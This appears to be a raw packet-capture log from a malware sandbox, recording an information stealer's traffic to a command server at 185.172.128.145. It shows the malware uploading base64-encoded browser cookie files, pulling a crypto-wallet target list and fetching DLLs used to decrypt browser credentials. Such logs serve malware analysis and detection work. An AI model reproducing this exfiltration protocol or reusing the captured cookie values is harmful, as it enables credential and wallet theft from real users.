Feb 21, 2024 00:22:54.997194052 CET	468	IN	Data Raw: 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d Data Ascii: bXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGN
Feb 21, 2024 00:22:56.213396072 CET	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB Host: 185.172.128.145 Content-Length: 5855 Connection: Keep-Alive Cache-Control: no-cache
Feb 21, 2024 00:22:56.216559887 CET	5855	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Feb 21, 2024 00:22:56.557943106 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:22:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:22:57.064009905 CET	94	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.145 Cache-Control: no-cache
Feb 21, 2024 00:22:57.352631092 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:22:57 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Feb 21, 2024 00:22:57.352677107 CET	1286	IN	Data Raw: 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B/81s:<R@B/92P @B
Feb 21, 2024 00:22:57.352690935 CET	1286	IN	Data Raw: 5d c3 8d b4 26 00 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 Data Ascii: ]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Feb 21, 2024 00:22:57.352704048 CET	1286	IN	Data Raw: 08 85 d2 74 04 0f b6 42 14 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 Data Ascii: tB]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$
Feb 21, 2024 00:22:57.352739096 CET	1286	IN	Data Raw: 18 83 e3 7f c7 42 04 00 00 00 00 b0 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f Data Ascii: BLpuBpuBxMMuMZ2Mx]uZxu
Feb 21, 2024 00:22:59.177647114 CET	953	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK Host: 185.172.128.145 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------EGIDAFBAEBKKEBFIJEBK--
Feb 21, 2024 00:22:59.515197992 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:22:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:22:59.721066952 CET	561	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJ Host: 185.172.128.145 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 2d 2d 0d 0a Data Ascii: ------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="file"------CBGCBGCAFIIECBFIDHIJ--
Feb 21, 2024 00:23:00.048993111 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:22:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:01.315357924 CET	561	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC Host: 185.172.128.145 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="file"------BKFBAKFCBFHIJJJJDBFC--
Feb 21, 2024 00:23:01.646442890 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Feb 21, 2024 00:23:02.764986038 CET	94	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.145 Cache-Control: no-cache
Feb 21, 2024 00:23:03.053309917 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:02 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Feb 21, 2024 00:23:04.055180073 CET	94	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.145 Cache-Control: no-cache
Feb 21, 2024 00:23:04.342976093 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:23:04 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
